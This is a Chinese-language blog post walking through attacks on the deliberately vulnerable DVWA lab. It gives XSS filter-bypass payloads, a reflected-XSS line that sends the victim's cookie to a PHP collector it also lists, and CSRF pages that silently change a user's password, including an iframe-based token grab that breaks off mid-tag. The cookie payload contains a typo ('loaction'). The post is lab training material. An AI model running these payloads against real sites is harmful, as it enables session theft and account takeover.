<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="DVWA," />










<meta name="description" content="xss存储型xsslow查看服务端代码可以发现对name 和 message没有 进行过滤和检查，因此存在xss漏洞 name参数输入时有字数限制，因此可以在F12中修改其长度或者抓包后改为： 12&lt;script&gt;alert(&#x2F;xss&#x2F;)&lt;&#x2F;script&gt;&lt;img src&#x3D;2  onerror&#x3D;alert(&#x2F;xss&#x2F;)&gt;  message参数也是相同以上两种都适">
<meta property="og:type" content="article">
<meta property="og:title" content="DVWA实践">
<meta property="og:url" content="http://yoursite.com/2020/03/14/DVWA%E5%AE%9E%E8%B7%B5/index.html">
<meta property="og:site_name" content="QuanYex&#39;s Blog">
<meta property="og:description" content="xss存储型xsslow查看服务端代码可以发现对name 和 message没有 进行过滤和检查，因此存在xss漏洞 name参数输入时有字数限制，因此可以在F12中修改其长度或者抓包后改为： 12&lt;script&gt;alert(&#x2F;xss&#x2F;)&lt;&#x2F;script&gt;&lt;img src&#x3D;2  onerror&#x3D;alert(&#x2F;xss&#x2F;)&gt;  message参数也是相同以上两种都适">
<meta property="og:image" content="http://lulu.izliang.com/yty/11bbd74c9ab776532a4f84dd860195b.png">
<meta property="og:image" content="http://lulu.izliang.com/yty/4c9040402a1505bdaa890ce28cb1afb.png">
<meta property="og:image" content="http://lulu.izliang.com/yty/ea2a7976dda046eeabe1b582ab40a94.png">
<meta property="og:image" content="http://lulu.izliang.com/yty/f2014522d434768aa62c8cb912c0a30.png">
<meta property="og:image" content="http://lulu.izliang.com/yty/sqlmap1.png">
<meta property="og:image" content="http://lulu.izliang.com/yty/sqlmap2.png">
<meta property="og:image" content="http://lulu.izliang.com/yty/sqlmap3.png">
<meta property="og:image" content="http://lulu.izliang.com/yty/sqlmap4.png">
<meta property="og:image" content="http://lulu.izliang.com/yty/yanshiceshi1.png">
<meta property="og:image" content="http://lulu.izliang.com/yty/yanshizhuru2.png">
<meta property="article:published_time" content="2020-03-14T07:14:39.000Z">
<meta property="article:modified_time" content="2020-04-11T07:32:15.908Z">
<meta property="article:author" content="QuanYex">
<meta property="article:tag" content="DVWA">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://lulu.izliang.com/yty/11bbd74c9ab776532a4f84dd860195b.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2020/03/14/DVWA实践/"/>





  <title>DVWA实践 | QuanYex's Blog</title>
  








<meta name="generator" content="Hexo 4.2.0"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">QuanYex's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-首页">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-归档">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/03/14/DVWA%E5%AE%9E%E8%B7%B5/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="QuanYex">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="https://ss2.bdstatic.com/70cFvnSh_Q1YnxGkpoWK1HF6hhy/it/u=1442298964,3218822834&fm=26&gp=0.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="QuanYex's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">DVWA实践</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2020-03-14T15:14:39+08:00">
                2020-03-14
              </time>
            

            
              <span class="post-meta-divider">|</span>
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-check-o"></i>
              </span>
              
                <span class="post-meta-item-text">更新于&#58;</span>
              
              <time title="更新于" itemprop="dateModified" datetime="2020-04-11T15:32:15+08:00">
                2020-04-11
              </time>
            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E5%AD%A6%E4%B9%A0%E5%AE%9E%E8%B7%B5/" itemprop="url" rel="index">
                    <span itemprop="name">学习实践</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="xss"><a href="#xss" class="headerlink" title="xss"></a>xss</h1><h2 id="存储型xss"><a href="#存储型xss" class="headerlink" title="存储型xss"></a>存储型xss</h2><h3 id="low"><a href="#low" class="headerlink" title="low"></a>low</h3><p>查看服务端代码可以发现对name 和 message没有 进行过滤和检查，因此存在xss漏洞</p>
<p>name参数输入时有字数限制，因此可以在F12中修改其长度或者抓包后改为：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;alert(<span class="regexp">/xss/</span>)&lt;<span class="regexp">/script&gt;</span></span><br><span class="line"><span class="regexp">&lt;img src=2  onerror=alert(/</span>xss/)&gt;</span><br></pre></td></tr></table></figure>

<p>message参数也是相同以上两种都适合其使用。 </p>
<a id="more"></a>

<h3 id="medium"><a href="#medium" class="headerlink" title="medium"></a>medium</h3><p>查看服务器源码可以发现代码中对message进行了限制，htmlspecialchars函数将预定义的字符转化成了html实体，使得xss无法实现。对于name参数，使用<code>str_replace( &#39;&lt;script&gt;&#39;, &#39;&#39;, $name )</code>语句简单过滤了<code>&lt;script&gt;</code>标签，无法完全抵挡xss。因此可以在name中利用xss。</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">str_replace对于大小写很重视，因此可以在name中输入：</span><br><span class="line">&lt;sCript&gt;alert(<span class="regexp">/xss/</span>)&lt;<span class="regexp">/sCript&gt;</span></span><br><span class="line"><span class="regexp"></span></span><br><span class="line"><span class="regexp">因为str_replace没有利用循环去掉所有的script标签，因此可以：</span></span><br><span class="line"><span class="regexp">&lt;scr&lt;script&gt;ipt&gt;alert(/</span>xss/)&lt;<span class="regexp">/script&gt;</span></span><br><span class="line"><span class="regexp"></span></span><br><span class="line"><span class="regexp">还可以利用非script标签的xss payload：</span></span><br><span class="line"><span class="regexp">&lt;img src=a onerror=alert(/</span>xss/)&gt;</span><br></pre></td></tr></table></figure>

<h3 id="high"><a href="#high" class="headerlink" title="high"></a>high</h3><p>查看服务器代码发现与medium相同的是message使用htmlspecialchars函数进行了限制，name中不在使用str_replace函数进行替换而是使用正则表达式来删除name参数中的script标签。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$name = preg_replace( <span class="string">'/&lt;(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i'</span>, <span class="string">''</span>, $name );</span><br><span class="line"></span><br><span class="line">表示去掉name参数中&lt;script</span><br></pre></td></tr></table></figure>

<p>这里name参数只针对<code>&lt;script&gt;</code>标签进行了限制，并未限制其他例如<code>&lt;img&gt;</code>、<code>&lt;iframe&gt;</code>等标签因此在name中：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=s onerror=alert(<span class="regexp">/xss/</span>)&gt;  </span><br><span class="line">    </span><br><span class="line">&lt;iframe src=<span class="number">1</span> onmouseover=alert(<span class="regexp">/xss/</span>) y=<span class="number">2016</span> /&gt;<span class="xml"><span class="tag">&lt;<span class="name">iframe</span>&gt;</span></span></span><br></pre></td></tr></table></figure>

<h2 id="反射型xss"><a href="#反射型xss" class="headerlink" title="反射型xss"></a>反射型xss</h2><h3 id="low-注意"><a href="#low-注意" class="headerlink" title="low(注意)"></a>low(注意)</h3><p>打开服务器源码发现并未对name进行任何限制。在name框中随便输入点击提交，发现输入的值显示在URL中，将URL中的value进行替换，便可以实现xss</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;alert(<span class="regexp">/xss/</span>)&lt;<span class="regexp">/script&gt;</span></span><br><span class="line"><span class="regexp">&lt;img src=a onerror=alert(/</span>xss/)&gt;</span><br></pre></td></tr></table></figure>

<p><strong>利用xss获取cookie：</strong></p>
<p>在www目录下创建cookie.php文件：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">file_put_contents(<span class="string">'cookie.txt'</span>,$_GET[<span class="string">'cookie'</span>]); <span class="comment">// 将获取到的cookie保存在cookie.txt中</span></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>在URL中将value改为：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;<span class="built_in">document</span>.loaction=<span class="string">'http://127.0.0.1/cookie.php?cookie='</span>+<span class="built_in">document</span>.cookie;&lt;<span class="regexp">/script&gt;</span></span><br></pre></td></tr></table></figure>

<p>此时完整的URL为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;quanyex.local.com&#x2F;dvwa-master&#x2F;vulnerabilities&#x2F;xss_r&#x2F;?name&#x3D;&lt;script&gt;document.loaction&#x3D;&#39;http:&#x2F;&#x2F;127.0.0.1&#x2F;cookie.php?cookie&#x3D;&#39;+document.cookie;&lt;&#x2F;script&gt;</span><br></pre></td></tr></table></figure>

<p><strong><font color=red size=15>注意：</font></strong></p>
<p>在这里URL中首先有name参数，其value值中含有一个新的URL和参数cookie，因此在这里需要给name的值进行一次URL编码，否则浏览器会截断，无法实现正常跳转。</p>
<p>浏览器自身编码之后为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;quanyex.local.com&#x2F;dvwa-master&#x2F;vulnerabilities&#x2F;xss_r&#x2F;?name&#x3D;%3Cscript%3Edocument.loaction&#x3D;%27http:&#x2F;&#x2F;127.0.0.1&#x2F;cookie.php?cookie&#x3D;%27+document.cookie;%3C&#x2F;script%3E</span><br></pre></td></tr></table></figure>

<p>可以发现含有特殊字符，因此需要自己将name的值进行编码为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">%3cscript%3edocument.loaction%3d&#39;http%3a%2f%2f127.0.0.1%2fcookie.php%3fcookie%3d&#39;%2bdocument.cookie%3b%3c%2fscript%3e</span><br></pre></td></tr></table></figure>

<p>将编码后的代码替换value值，这样一来就能正常实现其功能。</p>
<h3 id="medium-1"><a href="#medium-1" class="headerlink" title="medium"></a>medium</h3><p>查看服务端代码可以发现代码对变量name做了限制，<code>str_replace( &#39;&lt;script&gt;&#39;, &#39;&#39;, $_GET[ &#39;name&#39; ] )</code>使用str_replace函数将获取到的name中的<code>&lt;script&gt;</code>标签进行替换。但是str_replace函数是区分大小写的，而str_ireplace函数不区分，因此可以利用大小写来绕过。这里str_replace函数也没有利用循环，因此可以将script嵌套使用，该函数只限制了<code>&lt;script&gt;</code>标签，并没有对类似于<code>&lt;img&gt;</code>、<code>&lt;iframe&gt;</code>等标签进行限制，因此将url中的value值替换为：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;Script&gt;alert(<span class="regexp">/xss/</span>)&lt;<span class="regexp">/script&gt;</span></span><br><span class="line"><span class="regexp">&lt;scr&lt;script&gt;ipt&gt;alert(/</span>xss/)&lt;<span class="regexp">/script&gt;</span></span><br><span class="line"><span class="regexp">&lt;img src=a onerror=alert(/</span>xss/)&gt;</span><br></pre></td></tr></table></figure>

<h3 id="high-1"><a href="#high-1" class="headerlink" title="high"></a>high</h3><p>查看服务端代码可以看出对name参数使用正解表达式来进行限制，<code>preg_replace( &#39;/&lt;(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i&#39;, &#39;&#39;, $_GET[ &#39;name&#39; ] )</code>规定了将所有的<code>&lt;script&gt;</code>进行替换，不论大小写。但是代码并未对除<code>&lt;script&gt;</code>之外的标签进行限制，因此将url中的value值替换为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src&#x3D;s onerror&#x3D;alert(&#x2F;xss&#x2F;)&gt;</span><br></pre></td></tr></table></figure>

<p>便可以实现xss。</p>
<h2 id="DOM型xss"><a href="#DOM型xss" class="headerlink" title="DOM型xss"></a>DOM型xss</h2><h3 id="low-1"><a href="#low-1" class="headerlink" title="low"></a>low</h3><p>查看服务器源码并未有任何限制，因此类似于反射型xss直接将URL中value改为<code>&lt;script&gt;alert(/xss/)&lt;/script&gt;</code></p>
<h3 id="medium-2"><a href="#medium-2" class="headerlink" title="medium"></a>medium</h3><p>查看服务端代码，发现对default进行限制，代码如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (stripos ($default, <span class="string">"&lt;script"</span>) !== <span class="keyword">false</span>) &#123;</span><br><span class="line">        header (<span class="string">"location: ?default=English"</span>);</span><br><span class="line">        <span class="keyword">exit</span>;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>利用<code>stripos ($default, &quot;&lt;script&quot;)&quot;</code>该函数可以查找default中是否存在&lt;script，并且对大小写无要求，如果存在则使default=English。因此这里不能使用<code>&lt;script&gt;</code>标签，可以使用<code>&lt;image&gt;</code>等</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=a onerror=alert(<span class="regexp">/xss/</span>)&gt;</span><br></pre></td></tr></table></figure>

<p>但是将这个这段代码替换value并且执行后，发现页面并没有提示xss，查看源码发现该标签被当作value值，因此需要先闭合<code>&lt;option&gt;</code>，所有将代码改为:</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;<span class="regexp">/option&gt; &lt;img src=a onerror=alert(/</span>xss/)&gt;</span><br></pre></td></tr></table></figure>

<p>但是并未弹窗，于是我们查看源代码，发现语句中只有 &gt; 被插入到了option标签的值中，因为<code>&lt;/option&gt;</code>闭合了option标签，所以img标签并没有插入,因此还需要闭合select标签，这样mg标签就是独立的一条语句了</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;<span class="regexp">/option&gt;&lt;/</span>select&gt;<span class="xml"><span class="tag">&lt;<span class="name">img</span> <span class="attr">src</span>=<span class="string">a</span> <span class="attr">onerror</span>=<span class="string">alert(/xss/)</span>&gt;</span></span></span><br></pre></td></tr></table></figure>

<h3 id="high-2"><a href="#high-2" class="headerlink" title="high"></a>high</h3><p>查看服务端代码，发现对default的值进行了限制，必须是French、English、German、Spanish 其中一个，在这里需要使用#，在第一个#后面出现的任何字符，都会被浏览器解读为位置标识符。这意味着，这些字符都不会被发送到服务器端。因此我们可以在value之后：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">#&lt;script&gt;alert(&#x2F;xss&#x2F;)&lt;&#x2F;script&gt;</span><br></pre></td></tr></table></figure>

<p>这样就可以实现xss</p>
<h1 id="CSRF"><a href="#CSRF" class="headerlink" title="CSRF"></a>CSRF</h1><h2 id="low-2"><a href="#low-2" class="headerlink" title="low"></a>low</h2><p>打开页面，查看服务器代码发现并未有什么限制，因此在页面中正常设置新的密码123123，提交之后密码修改成功，此时的URL也发生改变，<code>http://quanyex.local.com/dvwa-master/vulnerabilities/csrf/?password_new=123123d&amp;password_conf=123123&amp;Change=Change#</code>,通过URL可以发现修改的密码显示在其中，因此在cookie尚未失效的情况下直接修改URL便可以实现修改密码。此时直接在URL中改变password和password_conf的值，<code>http://quanyex.local.com/dvwa-master/vulnerabilities/csrf/?password_new=password&amp;password_conf=password&amp;Change=Change#</code>，enter提交之后提示修改成功，F12打开网络，查看参数，发现传递参数确定是在URL中修改的值。所以这个链接若是用户点击，密码将会被修改。</p>
<p><strong>构造攻击页面</strong></p>
<ol>
<li><p>通过img,构造一个页面诱导用户点开，在cookie未失效时，密码会被自动修改。</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="meta-keyword">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">meta</span> <span class="attr">charset</span>=<span class="string">"utf-8"</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line">    </span><br><span class="line"><span class="tag">&lt;<span class="name">img</span> <span class="attr">src</span>=<span class="string">"http://quanyex.local.com/dvwa-master/vulnerabilities/csrf/?password_new=password&amp;password_conf=password&amp;Change=Change#"</span> <span class="attr">style</span>=<span class="string">"display:none"</span>&gt;</span></span><br><span class="line"></span><br><span class="line">    <span class="tag">&lt;<span class="name">h1</span>&gt;</span>404<span class="tag">&lt;<span class="name">h1</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">h2</span>&gt;</span>file not found.<span class="tag">&lt;<span class="name">h2</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>将关于密码操作的表单部分，通过javascript的onload事件加载和css代码来隐藏布局，按GET传递参数的方式，进一步构造html form表单，实现了受害者点击链接则会将密码修改。</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="meta-keyword">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">meta</span> <span class="attr">charset</span>=<span class="string">"utf-8"</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span> <span class="attr">onload</span>=<span class="string">"javascript:csrf()"</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="actionscript"><span class="function"><span class="keyword">function</span> <span class="title">csrf</span><span class="params">()</span></span>&#123;</span></span><br><span class="line"><span class="javascript"><span class="built_in">document</span>.getElementById(<span class="string">"button"</span>).click();</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">style</span>&gt;</span></span><br><span class="line">form&#123;</span><br><span class="line"><span class="css"><span class="selector-tag">display</span><span class="selector-pseudo">:none</span>;</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="tag">&lt;/<span class="name">style</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">form</span> <span class="attr">action</span>=<span class="string">"http://quanyex.local.com/dvwa-master/vulnerabilities/csrf/?"</span> <span class="attr">method</span>=<span class="string">"GET"</span>&gt;</span></span><br><span class="line">        New password:<span class="tag">&lt;<span class="name">br</span> /&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"password"</span> <span class="attr">AUTOCOMPLETE</span>=<span class="string">"off"</span> <span class="attr">name</span>=<span class="string">"password_new"</span> <span class="attr">value</span>=<span class="string">"password"</span>&gt;</span><span class="tag">&lt;<span class="name">br</span> /&gt;</span></span><br><span class="line">        Confirm new password:<span class="tag">&lt;<span class="name">br</span> /&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"password"</span> <span class="attr">AUTOCOMPLETE</span>=<span class="string">"off"</span> <span class="attr">name</span>=<span class="string">"password_conf"</span> <span class="attr">value</span>=<span class="string">"password"</span>&gt;</span><span class="tag">&lt;<span class="name">br</span> /&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">br</span> /&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"submit"</span> <span class="attr">id</span>=<span class="string">"button"</span> <span class="attr">name</span>=<span class="string">"Change"</span> <span class="attr">value</span>=<span class="string">"Change"</span> /&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">form</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>

</li>
</ol>
<h2 id="medium-3"><a href="#medium-3" class="headerlink" title="medium"></a>medium</h2><p>查看服务器源码，发现代码使用stripos检查http头，</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">stripos( $_SERVER[ <span class="string">'HTTP_REFERER'</span> ] ,$_SERVER[ <span class="string">'SERVER_NAME'</span> ]) !== <span class="keyword">false</span></span><br></pre></td></tr></table></figure>

<p>函数规定了<code>$_SERVER[ &#39;HTTP_REFERER&#39; ]</code>的值中必须包含`$_SERVER[ ‘SERVER_NAME’ ]``</p>
<p>``$_SERVER[ ‘HTTP_REFERER’ ]`：PHP中获取链接到当前页面的前一页面的url链接地址，即HTTP数据包中的Referer参数的值。</p>
<p><code>$_SERVER[ &#39;SERVER_NAME&#39; ]</code>：PHP中获取服务器主机的名称，即HTTP数据包中的Host参数的值。</p>
<p>过滤规则是http包头的Referer参数的值中必须包含主机名（这里是quanyex.local.com）,所以可以将攻击页面命名为quanyex.local.com.html就可以绕过了。（在本地不命名也可以，因为同用Phpstudy的apache服务器）</p>
<p>页面代码与上个级别的代码相同。</p>
<h2 id="high-3"><a href="#high-3" class="headerlink" title="high"></a>high</h2><p>查看服务器代码，代码加入了Anti-CSRF token机制，用户每次访问改密页面时，服务器会返回一个随机的token，向服务器发起请求时，需要提交token参数，而服务器在收到请求时，会优先检查token，只有token正确，才会处理客户端的请求。</p>
<p>大致思路就是获取token值，然后带着token值去请求服务器以成功修改密码，对于token值来说，如果你新建一个页面（储存于攻击者服务器下）去获取token（位于用户的服务器下）这是现代浏览器所不被允许的，例如：新建一个gettoken.html页面，页面代码如下：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="meta-keyword">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">meta</span> <span class="attr">charset</span>=<span class="string">"utf-8"</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span> <span class="attr">type</span>=<span class="string">"text/javascript"</span>&gt;</span></span><br><span class="line"><span class="actionscript">    <span class="function"><span class="keyword">function</span> <span class="title">attack</span><span class="params">()</span></span></span></span><br><span class="line"><span class="javascript">  &#123; <span class="built_in">document</span>.getElementsByName(<span class="string">'user_token'</span>[<span class="number">0</span>].value=<span class="built_in">document</span>.getElementById(<span class="string">"hack"</span>).contentWindow.document.getElementsByName(<span class="string">'user_token'</span>)[<span class="number">0</span>].value;</span></span><br><span class="line"><span class="javascript">   <span class="built_in">document</span>.getElementById(<span class="string">"transfer"</span>).submit(); </span></span><br><span class="line">  &#125;</span><br><span class="line"><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">iframe</span> <span class="attr">src</span>=<span class="string">"http://localhost/dvwa-master/vulnerabilities/csrf/"</span> <span class="attr">id</span>=<span class="string">"hack"</span> <span class="attr">border</span>=<span class="string">"0"</span> <span class="attr">height</span>=<span class="string">"400"</span> <span class="attr">width</span>=<span class="string">"400"</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;/<span class="name">iframe</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span> <span class="attr">onload</span>=<span class="string">"attack()"</span>&gt;</span></span><br><span class="line">   <span class="tag">&lt;<span class="name">form</span> <span class="attr">method</span>=<span class="string">"GET"</span> <span class="attr">id</span>=<span class="string">"transfer"</span> <span class="attr">action</span>=<span class="string">"http://localhost/DVWA-master/vulnerabilities/csrf"</span>&gt;</span></span><br><span class="line">   <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span 